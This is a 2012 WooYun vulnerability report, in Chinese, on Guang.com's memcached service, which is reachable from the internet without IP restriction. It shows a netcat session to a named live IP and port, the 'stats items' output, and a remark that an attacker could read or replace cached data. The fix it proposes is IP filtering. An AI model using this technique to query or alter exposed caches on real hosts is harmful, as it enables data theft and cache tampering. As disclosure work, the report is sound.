当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2012-04966
漏洞标题:
"逛"网memcached未作IP限制造成cache泄露
相关厂商:
Guang.Com
漏洞作者:
ReJeCt
提交时间:
2012-03-02 13:05
修复时间:
2012-04-16 13:06
公开时间:
2012-04-16 13:06
漏洞类型:
系统/服务运维配置不当
危害等级:
自评Rank:
10
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2012-03-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-04-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

memcached配置不当,导致服务暴露在外网。

详细说明:

C:\Windows\System32>C:\Users\ReJeCt\Desktop\nc.exe -vv 122.225.68.78 20011
122.225.68.78: 反向连接查询主机: h_errno 11004: 无数据
(UNKNOWN) [122.225.68.78] 20011 (?) 打开
stats items
STAT items:0:number 162752
STAT items:0:age 5057332
STAT items:0:evicted 3045158928
STAT items:0:evicted_nonzero 10922
STAT items:0:evicted_time 0
STAT items:0:outofmemory 0
STAT items:0:tailrepairs 0
STAT items:0:reclaimed 0
STAT items:1:number 163342
STAT items:1:age 88163
STAT items:1:evicted 11836
STAT items:1:evicted_nonzero 11836
STAT items:1:evicted_time 3597
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 22786
END

漏洞证明:


可以获取到相应cache数据,恶意者可以从中replace掉内容或干嘛的
ps:该ip另开有N个memcached服务端口 均会有不同的安全隐患。

修复方案:

限制ip 屏蔽掉外网访问,都懂得额.

版权声明:转载请注明来源 ReJeCt@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝